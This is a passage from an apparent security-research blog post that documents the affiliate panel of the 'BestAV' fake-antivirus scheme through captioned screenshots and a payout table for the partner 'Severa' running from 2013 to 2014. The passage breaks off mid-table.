<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaONDEH79s7H6vvpgI_O3HgunI_O86sO7SZ7nKAfCBkbb4kpnI71ZKZitNn9UmU72VVH93VYttIIVercUwmnGBaIyORS-dFAyrs8-HE2gbT-bzoRZKdohTfH1nDRZJz4Cs1alVSDPJ2hw/s1600/09-04-2014+13-47-10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaONDEH79s7H6vvpgI_O3HgunI_O86sO7SZ7nKAfCBkbb4kpnI71ZKZitNn9UmU72VVH93VYttIIVercUwmnGBaIyORS-dFAyrs8-HE2gbT-bzoRZKdohTfH1nDRZJz4Cs1alVSDPJ2hw/s1600/09-04-2014+13-47-10.png" width="400" /></a></div> Soft 3:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKu1LWelZb5fUbx41Fa-4HpB9jKluh61RzSNUdWFsO0k4l9MsfmgGwUldHhn0bK2ZVGDeXhzyV-nnpFpohKqcMFpBkpFVEZeMAYw4zPDXgc4GcWzq9ekUXuGxn7iDEGLG6jdQJe9B7REI/s1600/09-04-2014+13-47-41.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKu1LWelZb5fUbx41Fa-4HpB9jKluh61RzSNUdWFsO0k4l9MsfmgGwUldHhn0bK2ZVGDeXhzyV-nnpFpohKqcMFpBkpFVEZeMAYw4zPDXgc4GcWzq9ekUXuGxn7iDEGLG6jdQJe9B7REI/s1600/09-04-2014+13-47-41.png" width="400" /></a></div> <br /> News:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTYQZlCauImTrRCl19O8LO9es07EcRckFUkkH73sq4mceeRBevd3fY2HdNOsNso034_MXKtHG8EtIuvulVEFLOwQwKXtbtua5DDWwVfj6DgSY_RrV_Sa21wLAVJrTLeupFjmDByC5aSU/s1600/09-04-2014+13-48-40.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTYQZlCauImTrRCl19O8LO9es07EcRckFUkkH73sq4mceeRBevd3fY2HdNOsNso034_MXKtHG8EtIuvulVEFLOwQwKXtbtua5DDWwVfj6DgSY_RrV_Sa21wLAVJrTLeupFjmDByC5aSU/s1600/09-04-2014+13-48-40.png" width="400" /></a></div> <br /> Agreements:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdy0pRNYLKynYAUI_WdeDPOTgavAqo4JmXrBYms8LCKsXRcqcZqZSuKwJyVVeOV9R1fSH69it2_GUgfasOJUBASTOnPyoWJyFB01WcFOmTrCTY4OfGCZ0bnWizTcagD6dI7lMoUCyGS94/s1600/09-04-2014+13-49-28.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdy0pRNYLKynYAUI_WdeDPOTgavAqo4JmXrBYms8LCKsXRcqcZqZSuKwJyVVeOV9R1fSH69it2_GUgfasOJUBASTOnPyoWJyFB01WcFOmTrCTY4OfGCZ0bnWizTcagD6dI7lMoUCyGS94/s1600/09-04-2014+13-49-28.png" width="400" /></a></div> <br /> Users:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikYRvwi9TgVgLO6WPXJ5XH3c231zFj2hB5JyOf8fV1fUIRux9h0LpWT8-_ReAZE1zM3fg5lVDqgvlGld3iO2q5RKcSL3kcdX2J-ni4X3qP3EDYq-F-xNVHDo9YkzDHw-plbOOUKy_Pe_o/s1600/09-04-2014+13-50-27.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikYRvwi9TgVgLO6WPXJ5XH3c231zFj2hB5JyOf8fV1fUIRux9h0LpWT8-_ReAZE1zM3fg5lVDqgvlGld3iO2q5RKcSL3kcdX2J-ni4X3qP3EDYq-F-xNVHDo9YkzDHw-plbOOUKy_Pe_o/w400-h298/09-04-2014+13-50-27.png" width="400" /></a></div> <br /> Details for users:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVqMu4pHw0kpyAugIvHkcWA4_6poi7N_HuMb85LpGAv2mvSy-sbcshosbg97KPQfliS4hV_HAWwLiZt6kmwYGYouWgpgEi6p2pjXXsp7OzAUIXFoMl0I39uDRiTd30Hcvv5jVN9gdiTm8/s1600/BestAV_users_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVqMu4pHw0kpyAugIvHkcWA4_6poi7N_HuMb85LpGAv2mvSy-sbcshosbg97KPQfliS4hV_HAWwLiZt6kmwYGYouWgpgEi6p2pjXXsp7OzAUIXFoMl0I39uDRiTd30Hcvv5jVN9gdiTm8/s1600/BestAV_users_1.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGPuJEhBSKFYxMi8rvz2x2_jUY9r6yBXgIUrZPsOssuilWkf5sHKoVdfDEYleFHull0-V28El3U3BMPbshcE1pNz6ULU_e6NfNFoe2qtBWweE7iERtTsZtcA12oz1T45cdMxyO83EKPTI/s1600/BestAV_users_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGPuJEhBSKFYxMi8rvz2x2_jUY9r6yBXgIUrZPsOssuilWkf5sHKoVdfDEYleFHull0-V28El3U3BMPbshcE1pNz6ULU_e6NfNFoe2qtBWweE7iERtTsZtcA12oz1T45cdMxyO83EKPTI/s1600/BestAV_users_2.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNK3ld3IwhZEMkDjgA-s3qNBVhSrFjkwqpFfZhiBBu2Mw-fx3Vwdsn8lkAVBfTjVkhKRBAMZpYIvnzMASez8Mku5xn-Ul_nVPESGOLeKBJixz_bqmEGY1tkubaO9WqnplQTGNo6RpfpO8/s1600/BestAV_users_3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNK3ld3IwhZEMkDjgA-s3qNBVhSrFjkwqpFfZhiBBu2Mw-fx3Vwdsn8lkAVBfTjVkhKRBAMZpYIvnzMASez8Mku5xn-Ul_nVPESGOLeKBJixz_bqmEGY1tkubaO9WqnplQTGNo6RpfpO8/s1600/BestAV_users_3.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKQp0awXnyWoKNGVhkNi7fnun10J2EyGuVMa79uzkeRounp6ylthOd1PQwZVIgiCaSwUQ2MN1XZ8-X5sT4zfm8ms_r_tbdYxcD48IvYjSk91MtVunydxJeYUDLZbaMW2ifOjJxHh5qWo4/s1600/BestAV_users_4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKQp0awXnyWoKNGVhkNi7fnun10J2EyGuVMa79uzkeRounp6ylthOd1PQwZVIgiCaSwUQ2MN1XZ8-X5sT4zfm8ms_r_tbdYxcD48IvYjSk91MtVunydxJeYUDLZbaMW2ifOjJxHh5qWo4/s1600/BestAV_users_4.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3qLBq2hPcdD3lrXApp-xr6ayET0d4Mx96CbQGQZdo_TN6_zEqD0QS3DADuVltbyj5E0ugFHea3IxoIlx7kyI2uVoF0mTfZs6txINH5MVH3lSECf-MNUTmzK-4S6kPMnN7r4PB2V7OWjQ/s1600/BestAV_users_5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3qLBq2hPcdD3lrXApp-xr6ayET0d4Mx96CbQGQZdo_TN6_zEqD0QS3DADuVltbyj5E0ugFHea3IxoIlx7kyI2uVoF0mTfZs6txINH5MVH3lSECf-MNUTmzK-4S6kPMnN7r4PB2V7OWjQ/s1600/BestAV_users_5.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgddZakrcdxMNvN_PKEjax22mDHHc2zgoIwnwsIfxgwoFfDmtR3UoDnzPEC6mOaMPDWsG55bH0_8lHRFV2X8zqIulLd2P8-6I60YfX_srrV0UBXVQbJQ4jN3gwrrhUhrYBLsrVgm7bBlzg/s1600/BestAV_users_6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgddZakrcdxMNvN_PKEjax22mDHHc2zgoIwnwsIfxgwoFfDmtR3UoDnzPEC6mOaMPDWsG55bH0_8lHRFV2X8zqIulLd2P8-6I60YfX_srrV0UBXVQbJQ4jN3gwrrhUhrYBLsrVgm7bBlzg/s1600/BestAV_users_6.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3X2K3C1nrDGAIfaUTMvGLr0iC0PFcWcmHH1km9Oy2xaHeJnaIt8bZ76tb3E8sJjANtFwQfACEEWnL5zK5wLh2YHkmITPjR1QNtWHutihjFfQ8aqoaBKVopP8AIEDBe8__gSdDFJNw6Gk/s1600/BestAV_users_7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3X2K3C1nrDGAIfaUTMvGLr0iC0PFcWcmHH1km9Oy2xaHeJnaIt8bZ76tb3E8sJjANtFwQfACEEWnL5zK5wLh2YHkmITPjR1QNtWHutihjFfQ8aqoaBKVopP8AIEDBe8__gSdDFJNw6Gk/s1600/BestAV_users_7.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq4pK2oUAba3SxbWT89V1oZIv1VzL0LY3tD3OMK9X1zdLWRZHspupvWmGGf9qYpFw_3wVc19j3Rf26dN0R74tKCgLF3rhri8pJmFJo2HN-1sUEt3a_7u1oRBFM45XJDFzchWS4R0unPF8/s1600/BestAV_users_8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq4pK2oUAba3SxbWT89V1oZIv1VzL0LY3tD3OMK9X1zdLWRZHspupvWmGGf9qYpFw_3wVc19j3Rf26dN0R74tKCgLF3rhri8pJmFJo2HN-1sUEt3a_7u1oRBFM45XJDFzchWS4R0unPF8/s1600/BestAV_users_8.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGDjtKEkqmkkveWZFuY2jdK7qRDfmCUTguNvR0EEHKOSifUvy1YNgEsGZyZdjPmfuaukzPYKIkcTa4T9Gp-onsy5ykIrmf7vDKYioiX8ZyD11MliTBYdCDYBQgOW3cFHAmDriGQUrt2LY/s1600/BestAV_users_9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGDjtKEkqmkkveWZFuY2jdK7qRDfmCUTguNvR0EEHKOSifUvy1YNgEsGZyZdjPmfuaukzPYKIkcTa4T9Gp-onsy5ykIrmf7vDKYioiX8ZyD11MliTBYdCDYBQgOW3cFHAmDriGQUrt2LY/s1600/BestAV_users_9.png" width="400" /></a></div> <br /> 'Support' account:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN-wlVHXoPwKi7Vmjha17mKPJ7bPbFfCki5tJ0nfJoOmU4cCdHqqwznuIPLVJOSYaBZdraxAMJ4s28KQCviIevNn0u67WYKh0WIcC8aewJfK_n9fPXE5Wan69n974knbNCvFGc70XIc28/s1600/10-04-2014+15-08-40.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN-wlVHXoPwKi7Vmjha17mKPJ7bPbFfCki5tJ0nfJoOmU4cCdHqqwznuIPLVJOSYaBZdraxAMJ4s28KQCviIevNn0u67WYKh0WIcC8aewJfK_n9fPXE5Wan69n974knbNCvFGc70XIc28/s1600/10-04-2014+15-08-40.png" width="400" /></a></div> <br /> Action log, detail for the partner 'Severa':<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnnDTjp9_Ap6XVlUUF1LYYdu1K-OIar1xvZlw9XsQfQ9u8HK1wRKJYnCtz7UNB95nh0fFQ-CD3-13wOfnL9filQ-BC8DcGUlB7f1CYhXyJ3DQozxqTeqdZ1pHaYfCjizj8OfTyb57Ao94/s1600/09-04-2014+13-55-00.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnnDTjp9_Ap6XVlUUF1LYYdu1K-OIar1xvZlw9XsQfQ9u8HK1wRKJYnCtz7UNB95nh0fFQ-CD3-13wOfnL9filQ-BC8DcGUlB7f1CYhXyJ3DQozxqTeqdZ1pHaYfCjizj8OfTyb57Ao94/s1600/09-04-2014+13-55-00.png" width="400" /></a></div><p>&nbsp;Payements detail for the partner 'Severa':<br /> </p><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2kNpS5CiOeWOBxiy8LYxCjXCIneoDME0_Sjdnw1OlGVlob8JZmXl2rDJ7m9DnI-RaqgEdGg1PT3f_VK12Dxn8nl2cyfs_4F1TpXZuJu8DpEQve4fToZHOWXQG0RWhMEf2oVO4ewnUOMA/s1600/09-04-2014+13-56-18.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="349" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2kNpS5CiOeWOBxiy8LYxCjXCIneoDME0_Sjdnw1OlGVlob8JZmXl2rDJ7m9DnI-RaqgEdGg1PT3f_VK12Dxn8nl2cyfs_4F1TpXZuJu8DpEQve4fToZHOWXQG0RWhMEf2oVO4ewnUOMA/w400-h349/09-04-2014+13-56-18.png" width="400" /></a></div> 13077.52 $<br /> <br /> Edit user infos for the partner 'Severa':<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5XMsO5C4Ik_2kKJpx6sAWd2XzEinKJDqZvZD2T6Izex4NPJw9NPkc0MA1mA_5girwdlTQgd1WpTV03cZhDVbK4jr3o3PsPl58M9cg5RO75P_4AN4822DWHs9EXM_wX7_216g5c7YsGbs/s1600/09-04-2014+13-59-16.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5XMsO5C4Ik_2kKJpx6sAWd2XzEinKJDqZvZD2T6Izex4NPJw9NPkc0MA1mA_5girwdlTQgd1WpTV03cZhDVbK4jr3o3PsPl58M9cg5RO75P_4AN4822DWHs9EXM_wX7_216g5c7YsGbs/s1600/09-04-2014+13-59-16.png" width="400" /></a></div> <br />FakeAV to distribute:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2j4w8Wi7X6S2RMcwLd9exQglFNs0bX44O2pJPHypwAqpYnlKig2XUBJuwH1s-f0E3dmTcguTKmmGCQjtdJJc05dShi_m1B8tETMT-Or37a5xJh5BaeBCvxtePecLiXjauQsYRl3LXhlU/s1600/09-04-2014+14-01-48.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2j4w8Wi7X6S2RMcwLd9exQglFNs0bX44O2pJPHypwAqpYnlKig2XUBJuwH1s-f0E3dmTcguTKmmGCQjtdJJc05dShi_m1B8tETMT-Or37a5xJh5BaeBCvxtePecLiXjauQsYRl3LXhlU/s1600/09-04-2014+14-01-48.png" /></a></div> <br /> Role of Severa inside BestAV:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Kmuo2bIEoQyTDmVo0qK5P0903-5chw7OC3gRVJX8Jtv7iMS-SD1Yuq5jOvY_5qZhin054XL7-o51FDGgHqMKB6tjy_DD7retQpyI02XGsHAA7KpoRy86vRnX1OjoTPyfkvSEXFpU9o4/s1600/09-04-2014+14-03-47.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Kmuo2bIEoQyTDmVo0qK5P0903-5chw7OC3gRVJX8Jtv7iMS-SD1Yuq5jOvY_5qZhin054XL7-o51FDGgHqMKB6tjy_DD7retQpyI02XGsHAA7KpoRy86vRnX1OjoTPyfkvSEXFpU9o4/s1600/09-04-2014+14-03-47.png" /></a></div> <br /> Tickets made by Severa (none):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE4a5x8qghhIn1wivfNmbH-SW2j53kitcjQX635kUQa-W8PtBdTGXsLURKV8E_X6OTo-eYYlU-IyfX75gbLvoets9sBWqfrgVeYnUugDQPxrcOxzURZL5sYQIetXAws2_Xy2ny_idSmPw/s1600/09-04-2014+14-00-37.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE4a5x8qghhIn1wivfNmbH-SW2j53kitcjQX635kUQa-W8PtBdTGXsLURKV8E_X6OTo-eYYlU-IyfX75gbLvoets9sBWqfrgVeYnUugDQPxrcOxzURZL5sYQIetXAws2_Xy2ny_idSmPw/s1600/09-04-2014+14-00-37.png" width="400" /></a></div> <br /> Mass payements:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbEUp8n8Lc3KZqcivtVfyhqtnTgcIv8h4Xjok6wLQhL0-6sZJY3pEjrJPiseQg2WQVXd8p2VnVB1_SGjP61NJ2u7mpyAV5irug16YPxro9Dh0pytN08_ovd5FdkUvNQiVYii4ZXitQFxs/s1600/09-04-2014+14-05-45.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbEUp8n8Lc3KZqcivtVfyhqtnTgcIv8h4Xjok6wLQhL0-6sZJY3pEjrJPiseQg2WQVXd8p2VnVB1_SGjP61NJ2u7mpyAV5irug16YPxro9Dh0pytN08_ovd5FdkUvNQiVYii4ZXitQFxs/w400-h286/09-04-2014+14-05-45.png" width="400" /></a></div><p>&nbsp;Full list for mass payement:<br /> </p><div class="text" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"> ID&nbsp;&nbsp;&nbsp; Name&nbsp;&nbsp;&nbsp; List created&nbsp;&nbsp;&nbsp; Date&nbsp;&nbsp;&nbsp; Payed&nbsp;&nbsp;&nbsp; Total money&nbsp;&nbsp;&nbsp; Subject<br /> 136&nbsp;&nbsp;&nbsp; Payment till 2014-03-02&nbsp;&nbsp;&nbsp; 2014-03-02 14:15&nbsp;&nbsp;&nbsp; 2014-03-02&nbsp; 46995.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 135&nbsp;&nbsp;&nbsp; Payment till 2013-10-07-s2&nbsp;&nbsp;&nbsp; 2013-10-07 11:43&nbsp;&nbsp;&nbsp; 2013-10-07&nbsp; 12030.36 $&nbsp;&nbsp;&nbsp; soft2<br /> 134&nbsp;&nbsp;&nbsp; Payment till 2013-10-07&nbsp;&nbsp;&nbsp; 2013-10-07 11:43&nbsp;&nbsp;&nbsp; 2013-10-07&nbsp; 25580.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 133&nbsp;&nbsp;&nbsp; Payment till 2013-08-29-s1&nbsp;&nbsp;&nbsp; 2013-08-29 04:21&nbsp;&nbsp;&nbsp; 2013-08-29&nbsp; 25145.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 132&nbsp;&nbsp;&nbsp; Payment till 2013-08-29&nbsp;&nbsp;&nbsp; 2013-08-29 04:20&nbsp;&nbsp;&nbsp; 2013-08-29&nbsp; 13492.62 $&nbsp;&nbsp;&nbsp; soft2<br /> 131&nbsp;&nbsp;&nbsp; Payment till 2013-08-24-s2&nbsp;&nbsp;&nbsp; 2013-08-24 09:10&nbsp;&nbsp;&nbsp; 2013-08-24&nbsp; 41466.03 $&nbsp;&nbsp;&nbsp; soft2<br /> 130&nbsp;&nbsp;&nbsp; Payment till 2013-08-24&nbsp;&nbsp;&nbsp; 2013-08-24 09:10&nbsp;&nbsp;&nbsp; 2013-08-24&nbsp; 1425.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 129&nbsp;&nbsp;&nbsp; Payment till 2013-08-06-s2&nbsp;&nbsp;&nbsp; 2013-08-06 18:00&nbsp;&nbsp;&nbsp; 2013-08-06&nbsp; 22527.60 $&nbsp;&nbsp;&nbsp; soft2<br /> 128&nbsp;&nbsp;&nbsp; Payment till 2013-08-06-s1&nbsp;&nbsp;&nbsp; 2013-08-06 18:00&nbsp;&nbsp;&nbsp; 2013-08-06&nbsp; 20068.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 126&nbsp;&nbsp;&nbsp; Payment till 2013-07-30&nbsp;&nbsp;&nbsp; 2013-07-30 18:43&nbsp;&nbsp;&nbsp; 2013-07-30&nbsp; 7645.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 127&nbsp;&nbsp;&nbsp; Payment till 2013-07-30-s2&nbsp;&nbsp;&nbsp; 2013-07-30 18:43&nbsp;&nbsp;&nbsp; 2013-07-30&nbsp; 15429.69 $&nbsp;&nbsp;&nbsp; soft2<br /> 125&nbsp;&nbsp;&nbsp; Payment till 2013-07-24-s2&nbsp;&nbsp;&nbsp; 2013-07-24 14:25&nbsp;&nbsp;&nbsp; 2013-07-24&nbsp; 2886.27 $&nbsp;&nbsp;&nbsp; soft2<br /> 124&nbsp;&nbsp;&nbsp; Payment till 2013-07-24&nbsp;&nbsp;&nbsp; 2013-07-24 14:25&nbsp;&nbsp;&nbsp; 2013-07-24&nbsp; 10250.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 123&nbsp;&nbsp;&nbsp; Payment till 2013-07-22-s2&nbsp;&nbsp;&nbsp; 2013-07-22 20:59&nbsp;&nbsp;&nbsp; 2013-07-22&nbsp; 23516.16 $&nbsp;&nbsp;&nbsp; soft2<br /> 122&nbsp;&nbsp;&nbsp; Payment till 2013-07-22&nbsp;&nbsp;&nbsp; 2013-07-22 20:58&nbsp;&nbsp;&nbsp; 2013-07-22&nbsp; 1074.98 $&nbsp;&nbsp;&nbsp; soft1<br /> 121&nbsp;&nbsp;&nbsp; Payment till 2013-07-16-s2&nbsp;&nbsp;&nbsp; 2013-07-16 18:53&nbsp;&nbsp;&nbsp; 2013-07-16&nbsp; 39988.23 $&nbsp;&nbsp;&nbsp; soft2<br /> 120&nbsp;&nbsp;&nbsp; Payment till 2013-07-16&nbsp;&nbsp;&nbsp; 2013-07-16 18:53&nbsp;&nbsp;&nbsp; 2013-07-16&nbsp; 4860.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 118&nbsp;&nbsp;&nbsp; Payment till 2013-07-10-s1&nbsp;&nbsp;&nbsp; 2013-07-10 19:19&nbsp;&nbsp;&nbsp; 2013-07-10&nbsp; 9980.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 119&nbsp;&nbsp;&nbsp; Payment till 2013-07-10-s2&nbsp;&nbsp;&nbsp; 2013-07-10 19:19&nbsp;&nbsp;&nbsp; 2013-07-10&nbsp; 11510.35 $&nbsp;&nbsp;&nbsp; soft2<br /> 117&nbsp;&nbsp;&nbsp; Payment till 2013-07-08-s3&nbsp;&nbsp;&nbsp; 2013-07-08 21:44&nbsp;&nbsp;&nbsp; 2013-07-08&nbsp; 34.77 $&nbsp;&nbsp;&nbsp; soft3<br /> 116&nbsp;&nbsp;&nbsp; Payment till 2013-07-08-s2&nbsp;&nbsp;&nbsp; 2013-07-08 21:44&nbsp;&nbsp;&nbsp; 2013-07-08&nbsp; 29119.00 $&nbsp;&nbsp;&nbsp; soft2<br /> 115&nbsp;&nbsp;&nbsp; Payment till 2013-07-08&nbsp;&nbsp;&nbsp; 2013-07-08 21:44&nbsp;&nbsp;&nbsp; 2013-07-08&nbsp; 22120.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 114&nbsp;&nbsp;&nbsp; Payment till 2013-07-01-s2&nbsp;&nbsp;&nbsp; 2013-07-01 20:05&nbsp;&nbsp;&nbsp; 2013-07-01&nbsp; 38150.70 $&nbsp;&nbsp;&nbsp; soft2<br /> 113&nbsp;&nbsp;&nbsp; Payment till 2013-07-01&nbsp;&nbsp;&nbsp; 2013-07-01 20:05&nbsp;&nbsp;&nbsp; 2013-07-01&nbsp; 725.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 112&nbsp;&nbsp;&nbsp; Payment till 2013-06-18-s2&nbsp;&nbsp;&nbsp; 2013-06-18 20:04&nbsp;&nbsp;&nbsp; 2013-06-18&nbsp; 1463.64 $&nbsp;&nbsp;&nbsp; soft2<br /> 111&nbsp;&nbsp;&nbsp; Payment till 2013-06-18-s1&nbsp;&nbsp;&nbsp; 2013-06-18 20:04&nbsp;&nbsp;&nbsp; 2013-06-18&nbsp; 16450.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 108&nbsp;&nbsp;&nbsp; Payment till 2013-06-11&nbsp;&nbsp;&nbsp; 2013-06-11 17:50&nbsp;&nbsp;&nbsp; 2013-06-11&nbsp; 1935.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 109&nbsp;&nbsp;&nbsp; Payment till 2013-06-11-s2&nbsp;&nbsp;&nbsp; 2013-06-11 17:50&nbsp;&nbsp;&nbsp; 2013-06-11&nbsp; 51693.56 $&nbsp;&nbsp;&nbsp; soft2<br /> 110&nbsp;&nbsp;&nbsp; Payment till 2013-06-11-s3&nbsp;&nbsp;&nbsp; 2013-06-11 17:51&nbsp;&nbsp;&nbsp; 2013-06-11&nbsp; 200.78 $&nbsp;&nbsp;&nbsp; soft3<br /> 107&nbsp;&nbsp;&nbsp; Payment till 2013-06-08-s1&nbsp;&nbsp;&nbsp; 2013-06-08 07:25&nbsp;&nbsp;&nbsp; 2013-06-08&nbsp; 14940.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 106&nbsp;&nbsp;&nbsp; Payment till 2013-06-08-s2&nbsp;&nbsp;&nbsp; 2013-06-08 07:25&nbsp;&nbsp;&nbsp; 2013-06-08&nbsp; 291.55 $&nbsp;&nbsp;&nbsp; soft2<br /> 105&nbsp;&nbsp;&nbsp; Payment till 2013-06-01-s2&nbsp;&nbsp;&nbsp; 2013-06-01 21:06&nbsp;&nbsp;&nbsp; 2013-06-01&nbsp; 30226.79 $&nbsp;&nbsp;&nbsp; soft2<br /> 104&nbsp;&nbsp;&nbsp; Payment till 2013-06-01&nbsp;&nbsp;&nbsp; 2013-06-01 21:06&nbsp;&nbsp;&nbsp; 2013-06-01&nbsp; 13170.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 102&nbsp;&nbsp;&nbsp; Payment till 2013-05-27-s1&nbsp;&nbsp;&nbsp; 2013-05-27 20:50&nbsp;&nbsp;&nbsp; 2013-05-27&nbsp; 905.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 103&nbsp;&nbsp;&nbsp; Payment till 2013-05-27-s2&nbsp;&nbsp;&nbsp; 2013-05-27 20:50&nbsp;&nbsp;&nbsp; 2013-05-27&nbsp; 31070.58 $&nbsp;&nbsp;&nbsp; soft2<br /> 101&nbsp;&nbsp;&nbsp; Payment till 2013-05-22-s3&nbsp;&nbsp;&nbsp; 2013-05-22 11:08&nbsp;&nbsp;&nbsp; 2013-05-22&nbsp; 36.08 $&nbsp;&nbsp;&nbsp; soft3<br /> 100&nbsp;&nbsp;&nbsp; Payment till 2013-05-22-s2&nbsp;&nbsp;&nbsp; 2013-05-22 11:08&nbsp;&nbsp;&nbsp; 2013-05-22&nbsp; 9115.38 $&nbsp;&nbsp;&nbsp; soft2<br /> 99&nbsp;&nbsp;&nbsp; Payment till 2013-05-22&nbsp;&nbsp;&nbsp; 2013-05-22 11:08&nbsp;&nbsp;&nbsp; 2013-05-22&nbsp; 4600.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 98&nbsp;&nbsp;&nbsp; Payment till 2013-05-20-s3&nbsp;&nbsp;&nbsp; 2013-05-20 12:01&nbsp;&nbsp;&nbsp; 2013-05-20&nbsp; 4.85 $&nbsp;&nbsp;&nbsp; soft3<br /> 97&nbsp;&nbsp;&nbsp; Payment till 